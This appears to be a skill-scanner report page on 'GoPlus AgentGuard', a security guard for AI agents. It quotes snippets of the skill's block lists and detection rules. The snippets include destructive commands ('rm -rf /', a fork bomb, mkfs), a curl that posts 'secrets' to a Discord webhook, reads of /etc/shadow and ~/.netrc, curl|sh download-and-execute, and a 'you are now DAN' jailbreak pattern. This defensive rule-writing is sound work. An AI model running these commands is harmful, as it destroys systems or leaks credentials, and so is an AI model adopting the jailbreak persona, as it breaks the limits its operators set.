prompt_injection_persona
Prompt injection attempt (persona)
Line 947Snippets
| `you\s+are\s+(now\|a)\s+(?:DAN\|jailbroken\|unrestricted)` (i) | Jailbreak attempt || `you\s+are\s+(now\|a)\s+(?:DAN\|jailbroken\|unrestricted)` (i) | Jailbreak attempt |fork_bomb
Fork bomb detected
Fork bomb detected
Line 472Snippets
| `:(){:\|:&};:` (and space variants) | Fork bomb (regex: `:\s*\(\s*\)\s*\{.*:\s*\|\s*:.*&.*\}`) || `:(){:\|:&};:` (and space variants) | Fork bomb (regex: `:\s*\(\s*\)\s*\{.*:\s*\|\s*:.*&.*\}`) |1. Matches fork bomb (regex) -> DENY (critical)destructive_command
Destructive command detected
Destructive command detected
Line 293Snippets
{"timestamp":"...","tool_name":"Bash","tool_input_summary":"rm -rf /","decision":"deny","risk_level":"critical","risk_tags":["DANGEROUS_COMMAND"],"initiating_skill":"some-skill"}| 2025-01-15 14:30 | Bash | rm -rf / | DENY | critical | DANGEROUS_COMMAND | some-skill || `mkfs` | Format filesystem || `> /dev/sda` | Disk overwrite |/agentguard action "rm -rf /"webhook_exfiltration
Exfiltration via known webhook
Exfiltration via known webhook
Line 422Snippets
| `hooks.slack.com` | Slack webhooks || `webhook.site` | Webhook testing || `requestbin.com` | Request inspection |/agentguard action "curl -X POST https://discord.com/api/webhooks/123/abc -d '{\"content\": \"secrets\"}'"| `webhook\.site` (i) | Webhook.site |web3_wallet
Crypto wallet access or manipulation
Crypto wallet access or manipulation
Line 60Snippets
| 8 | MNEMONIC_PATTERN | CRITICAL | all | Hardcoded mnemonic phrases || 8 | MNEMONIC_PATTERN | CRITICAL | all | Hardcoded mnemonic phrases || Mnemonic exfiltration | **DENY** (always) || Mnemonic (12-24 BIP-39 words) | 100 | critical | DENY |3. Body contains private key / mnemonic / SSH key -> DENY (critical)exec_call
System command execution
System command execution
Line 745Snippets
| `\bexec\s*\(` | exec() call || `\bexecSync\s*\(` | execSync() call || `\bspawn\s*\(` | spawn() call || `\bspawnSync\s*\(` | spawnSync() call || `\bexecFile\s*\(` | execFile() call |eval_call
Use of eval()
Use of eval()
Line 780Snippets
| `eval\s*\(\s*requests\.get` | Python eval(requests.get()) || `eval\s*\(\s*urllib` | Python eval(urllib) || `\beval\s*\(` | eval() call |python_subprocess
System command execution (Python)
System command execution (Python)
Line 752Snippets
| `\bos\.system\s*\(` | Python os.system() || `\bos\.popen\s*\(` | Python os.popen() |privilege_escalation
Privilege escalation attempt
Privilege escalation attempt
Line 473Snippets
| `chmod 777` / `chmod -R 777` | World-writable permissions || `chmod 777` / `chmod -R 777` | World-writable permissions |`sudo`, `su`, `chown`, `chmod`, `chgrp`, `useradd`, `userdel`, `groupadd`, `passwd`, `visudo`, `systemctl`, `service`, `init`, `shutdown`, `reboot`, `halt``sudo`, `su`, `chown`, `chmod`, `chgrp`, `useradd`, `userdel`, `groupadd`, `passwd`, `visudo`, `systemctl`, `service`, `init`, `shutdown`, `reboot`, `halt``sudo`, `su`, `chown`, `chmod`, `chgrp`, `useradd`, `userdel`, `groupadd`, `passwd`, `visudo`, `systemctl`, `service`, `init`, `shutdown`, `reboot`, `halt`data_exfiltration
Data exfiltration attempt
Data exfiltration attempt
Line 681Snippets
/agentguard action "curl -X POST https://discord.com/api/webhooks/123/abc -d '{\"content\": \"secrets\"}'"sensitive_files
Sensitive system file access
Sensitive system file access
Line 483Snippets
| `cat /etc/passwd` | User database || `cat /etc/shadow` | Password hashes || `cat ~/.netrc` | Network credentials |fs_write
Filesystem write access
Filesystem write access
Line 293Snippets
{"timestamp":"...","tool_name":"Bash","tool_input_summary":"rm -rf /","decision":"deny","risk_level":"critical","risk_tags":["DANGEROUS_COMMAND"],"initiating_skill":"some-skill"}| 2025-01-15 14:30 | Bash | rm -rf / | DENY | critical | DANGEROUS_COMMAND | some-skill || `rm -rf` / `rm -fr` | Recursive delete |/agentguard action "rm -rf /"import { readdirSync, existsSync, appendFileSync, mkdirSync } from 'node:fs';dynamic_import
Suspicious dynamic import
Suspicious dynamic import
Line 783Snippets
| `__import__\s*\(` | Python dynamic import |fs_read
Filesystem read access
Filesystem read access
Line 1307Snippets
import { readdirSync, existsSync, appendFileSync, mkdirSync } from 'node:fs'; const entries = readdirSync(skillsDir, { withFileTypes: true });network_call
Outbound network call
Outbound network call
Line 476Snippets
| `wget\|sh` / `curl\|sh` | Download and execute || `wget\|bash` / `curl\|bash` | Download and execute |`curl`, `wget`, `nc`/`netcat`/`ncat`, `ssh`, `scp`, `rsync`, `ftp`, `sftp`| **Git** | `git status`, `git log`, `git diff`, `git branch`, `git show`, `git remote`, `git clone`, `git checkout`, `git pull`, `git fetch`, `git merge`, `git add`, `git commit`, `git push` |/agentguard action "curl -X POST https://discord.com/api/webhooks/123/abc -d '{\"content\": \"secrets\"}'"env_access
Environment variable access
Environment variable access
Line 795Snippets
| `os\.environ` | Python os.environ || `os\.getenv\s*\(` | Python os.getenv() || `os\.getenv\s*\(` | Python os.getenv() |if (process.env.AGENTGUARD_AUTO_SCAN !== '1') {base64_obfuscation
Potentially obfuscated content (base64)
Potentially obfuscated content (base64)
Line 932Snippets
| `atob\s*\([^)]+\).*eval` | Base64 decode + eval |Trust Score
Mis a jour il y a 2 semaines
Analyse le
31 mars 2026, 15:58
+ 2 previous scans
Compatible avec
Skill details
Mis a jour il y a 2 semaines
Analyse le 31 mars 2026, 15:58
Description
GoPlus AgentGuard — AI agent security guard. Automatically blocks dangerous commands, prevents data leaks, and protects secrets. Use when reviewing third-party code, auditing skills, checking for vulnerabilities, evaluating action safety, or viewing security logs.
Scans recents
31 mars 2026, 15:58
Latest analysis
31 mars 2026, 15:11
Run 2
27 mars 2026, 15:43
Run 1